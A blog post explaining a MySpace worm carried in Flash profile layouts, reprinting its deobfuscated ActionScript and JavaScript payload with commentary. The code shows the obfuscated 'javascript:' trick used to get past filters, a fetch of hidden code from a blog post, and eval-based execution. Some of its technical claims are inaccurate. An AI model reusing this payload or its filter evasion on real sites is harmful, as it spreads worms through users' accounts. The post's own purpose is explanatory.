Myspace SWF Hack – it works

Myspace users can use SWF (Flash movies) to make their Layout. But Flash movie can be more than a simple animation. It has the ability to do action. This is called Action Scripting. While you are viewing someone’s Profile with Animated Flash movie your profile data’s like your email address and password can be hijacked from your cookie and saved in a place in behind.

I have recently came through a Digg story published by kinematic where he mentioned the Myspace hack technique. He actually decompiled a SWF file in Myspace to see it’s action script which revealed the secret of the hacking. It is advanced Javascript called AJAX which was used to hack.

When you visited an already infected page, there was an SWF embedded (“redirect.swf”) which contained the actionscript:

Which looks pretty obfuscated, however, when you space it out and add comments:

getURL(”
javas\n\r
cript:
//this translates in the browser to: “javascript:”
//which myspace really should have blocked now.
var x = new ActiveXObject(\’Msxml2.XMLHTTP\’);
// loads a new xmlHTTP object, sets it as var “x”
x.open(\’GET\’,\’http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\’,true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\’BX-\’)+3,pg.indexOf(\’-EX\’));
// loads into “sc” the contents of the response text from the place where
// the end of “BX-” (that’s the +3) is first encountered up until it finds the start of
// “-EX”, this is all the nasty JS.
while ( (sc.indexOf(\’\’)!=-1) || (sc.indexOf(\’-XXX\’)!=-1) )
// while “sc” (the code) doesn’t contain “” or “-XXX” then:
{
var n=sc.indexOf(\’\’);
// n is the start of where it finds “” in “sc”
if (n==-1)
n=sc.indexOf(\’-XXX\’);
// if it cant find “, then make n where it can find “-XXX”

// thist bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX’s and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pull.
// the crap was in there in the first place to get past myspace’s filters, I presume.
};
// this iterates through and removes the -XXX’s from the blog post
” + “eval(sc);
// evaluate “sc” – this is what does it all.
} // end of readystate==4 “if”
}; //end of function
” //closing the quote from the SWF getURL() function
+
”
x.send(null);
// adds on sending “null” to the xmlHTTP object.
“, “”
// no target, so it just executes.
);// end of SWF getURL function.

In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.

If you are not a Programmer You can’t understand what it does. If you are infected properly this script will be able to modify your profile with something attacker wants. In the same way using the technique called Cross site scripting an attacker can change your password post bulletins to your friends without your help! Myspace can’t help you out on this.